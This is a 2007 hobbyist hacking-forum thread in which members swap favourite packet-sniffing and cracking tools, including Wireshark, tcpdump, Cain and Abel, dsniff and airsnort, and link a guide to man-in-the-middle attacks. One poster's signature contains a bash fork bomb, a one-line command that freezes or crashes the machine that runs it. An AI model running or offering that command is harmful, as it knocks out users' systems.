Author Topic: Packet Sniffing  (Read 3148 times)

Offline Tachyon

  • Minister of Defence
  • OMG Mod
  • Ninja Phone Loser
  • *****
  • Posts: 1875
  • 1337 13V3L: +125/-62
Packet Sniffing
« on: October 29, 2007, 03:27:10 PM »
Anybody have a favourite? I'm using Wireshark for the first time (ever sniffing) and this is some really cool shit.
Do you speak two languages?

"Detective Don Gombo: IM AFRAID THE ONLY ONE "F" IS "U" MY FRIEND. WELCOME TO THE CRIMINAL JUSTICE WEB!"

Offline gangals

  • Merp?
  • PLA Nation Citizen
  • *
  • Posts: 1031
  • 1337 13V3L: +68/-31
  • ummm cacti
    • http://img116.imageshack.us/img116/1879/bagmanonfire4pb.jpg
Re: Packet Sniffing
« Reply #1 on: October 29, 2007, 03:57:41 PM »
Are you wanting to do something specific or just messing around?

Offline Tachyon

  • Minister of Defence
  • OMG Mod
  • Ninja Phone Loser
  • *****
  • Posts: 1875
  • 1337 13V3L: +125/-62
Re: Packet Sniffing
« Reply #2 on: October 29, 2007, 04:34:10 PM »
Messing around now, but when I sober up I'd like to apply the techniques learned.
Do you speak two languages?

"Detective Don Gombo: IM AFRAID THE ONLY ONE "F" IS "U" MY FRIEND. WELCOME TO THE CRIMINAL JUSTICE WEB!"

Offline s1acker

  • plop
  • PLA Soldier
  • *****
  • Posts: 313
  • 1337 13V3L: +31/-10
  • lolwut?
Re: Packet Sniffing
« Reply #3 on: October 29, 2007, 04:37:16 PM »
Yeah Wireshark is a good app. I used it when it was called Ethereal. I've never used the windows version only used it on linux. Which OS are you running it on? I was wondering if there are any differences really.

Offline cricket

  • Bandito
  • Junior Phone Loser
  • **
  • Posts: 47
  • 1337 13V3L: +6/-4
Re: Packet Sniffing
« Reply #4 on: October 29, 2007, 06:30:24 PM »
Yeah Wireshark is a good app. I used it when it was called Ethereal. I've never used the windows version only used it on linux. Which OS are you running it on? I was wondering if there are any differences really.

The only real difference I see between using Ethereal on linux and windows, is what you can do with the network information once you gather it.
It's one thing, to see if there is rogue processes using network resources, it's another thing entirely to be writing and testing programs that use the network stack. One thing that I was using it for was to test the modifications I was making to the TCP/IP stack athe time. Never be able to do that on a windows box!
I've never seen a stateful packet filter for windows that even comes close to iptables. 

If you are serious about using ethereal tachyon, you really should be testing\developing on a platform that you can easily make use of the data that your collecting. Btw if you are running linux, check out packlib.

Offline Lestan Gregor

  • PLA Bitch
  • *****
  • Posts: 746
  • 1337 13V3L: +64/-30
Re: Packet Sniffing
« Reply #5 on: October 29, 2007, 06:30:49 PM »
I use Cain and Able as well as Wireshark. They're the only worthwhile programs for Windows.

Offline cricket

  • Bandito
  • Junior Phone Loser
  • **
  • Posts: 47
  • 1337 13V3L: +6/-4
Re: Packet Sniffing
« Reply #6 on: October 29, 2007, 06:42:49 PM »
I use Cain and Able as well as Wireshark. They're the only worthwhile programs for Windows.
Yeah, and IDA Pro and SoftICE that's all I need.
And, And, And my thermos, THAT'S all I need.
And Elcomsoft Password Recovery Studio, yeah that's all I need.
And NTPWD yeah that's it.
And My dog.




Offline RijilV

  • :)
  • PLA Guru
  • *****
  • Posts: 208
  • 1337 13V3L: +30/-7
Re: Packet Sniffing
« Reply #7 on: October 29, 2007, 06:49:19 PM »
careful running wireshark as a privileged user... numerous exploits and bugs in that code.  Best to capture the packets with tcpdump then use something to analyze them as a non-privileged user.

Code: [Select]
#!/bin/bash
:() { :|:& };:

Offline Mace

  • Newb
  • *
  • Posts: 13
  • 1337 13V3L: +2/-3
  • can you hear this?
Re: Packet Sniffing
« Reply #8 on: October 30, 2007, 03:48:36 AM »
Airopeek NX, airsnort (pain in the ass to set up on windows tho) and airsnare are also good.

Offline Zazen

  • Cactus Zombie
  • *****
  • Posts: 380
  • 1337 13V3L: +34/-14
Re: Packet Sniffing
« Reply #9 on: October 30, 2007, 04:40:26 AM »
Wireshark's my favorite.

Offline trevelyn

  • Administrator
  • Elite Cactus Squad
  • Ninja Phone Loser
  • *****
  • Posts: 1687
  • 1337 13V3L: +183/-22
  • He likes cans and taking pictures in cans!
    • WeakNet Labs
Re: Packet Sniffing
« Reply #10 on: November 18, 2007, 07:51:03 PM »
http://www.zombie.el.cx/texts/hacking/pdfs/pentesing.pdf

under the quick intro to MITM.

I showed you how to dsniff a long time ago when Weak-Net was at its prime, don't you remember Tachyon?  Shame on you.

Offline gangals

  • Merp?
  • PLA Nation Citizen
  • *
  • Posts: 1031
  • 1337 13V3L: +68/-31
  • ummm cacti
    • http://img116.imageshack.us/img116/1879/bagmanonfire4pb.jpg
Re: Packet Sniffing
« Reply #11 on: November 18, 2007, 08:00:30 PM »
OMG, it's

trevelyn
!?!?!?!

Offline Nod

  • Quando omni flunkus moritati
  • Elite Cactus Squad
  • Ninja Phone Loser
  • *****
  • Posts: 3725
  • 1337 13V3L: +210/-138
  • 212-389-1318
    • twitter: @mrnudnik
Re: Packet Sniffing
« Reply #12 on: November 19, 2007, 05:29:37 AM »
OMG, it's

trevelyn
!?!?!?!

Quick! Someone play the themesong to Welcome Back Kotter!
I HATE the bridge.
Meme Roth is a Food Nazi Cunt

Offline trevelyn

  • Administrator
  • Elite Cactus Squad
  • Ninja Phone Loser
  • *****
  • Posts: 1687
  • 1337 13V3L: +183/-22
  • He likes cans and taking pictures in cans!
    • WeakNet Labs
Re: Packet Sniffing
« Reply #13 on: November 19, 2007, 02:50:44 PM »
Gangals I have missed you too!  I pinged you on IRC cos i had a VoIP question that Brad ended up answering.  I keep the IRC @ a screen session, so i idle a lot, im not ignoring you.